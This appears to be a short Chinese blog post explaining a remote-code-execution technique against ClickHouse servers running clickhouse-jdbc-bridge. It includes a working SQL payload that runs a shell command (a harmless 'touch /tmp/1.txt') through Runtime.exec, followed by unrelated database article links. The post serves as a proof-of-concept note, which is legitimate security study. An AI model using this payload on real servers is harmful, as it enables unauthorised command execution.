clickhouse-jdbc-bridge rce

clickhouse-jdbc-bridge 是什么

JDBC bridge for ClickHouse®. It acts as a stateless proxy passing queries from ClickHouse to external datasources. With this extension, you can run distributed query on ClickHouse across multiple datasources in real time, which in a way simplifies the process of building data pipelines for data warehousing, monitoring and integrity check etc.

简单来说是clickhouse服务端的一个组件 功能是用来创建新的jdbc连接

https://github.com/ClickHouse/clickhouse-jdbc-bridge

RCE

当我们连接到clickhouse的时候,如果服务端支持clickhouse-jdbc-bridge

那么可以输入以下命令RCE

复制代码
SELECT *
FROM jdbc('script', 's=[3];s[0]="/bin/bash";s[1]="-c";s[2]="touch /tmp/1.txt";java.lang.Runtime.getRuntime().exec(s);')

然后可以在服务器端/tmp目录下看到1.txt

相关推荐
Han.miracle4 分钟前
数据库圣经第二章——简单的my.ini基础配置介绍
数据库
八怪1 小时前
KILL MTS的一个worker线程会怎么样
数据库
-Xie-2 小时前
Mysql杂志(三十一)——Join连接算法与子查询、排序优化
数据库·mysql
程序新视界2 小时前
在连表查询场景下,MySQL隐式转换存在的坑
数据库·mysql·dba
九河云3 小时前
在云计算环境中实施有效的数据安全策略
大数据·网络·数据库·云计算
爱吃烤鸡翅的酸菜鱼3 小时前
从数据库直连到缓存预热:城市列表查询的性能优化全流程
java·数据库·后端·spring·个人开发
dualven_in_csdn4 小时前
ubuntu离线安装 xl2tpd
linux·数据库·ubuntu
初听于你6 小时前
高频面试题解析:算法到数据库全攻略
数据库·算法
BTU_YC12 小时前
Neo4j查询计划完全指南:读懂数据库的“执行蓝图“
数据库·neo4j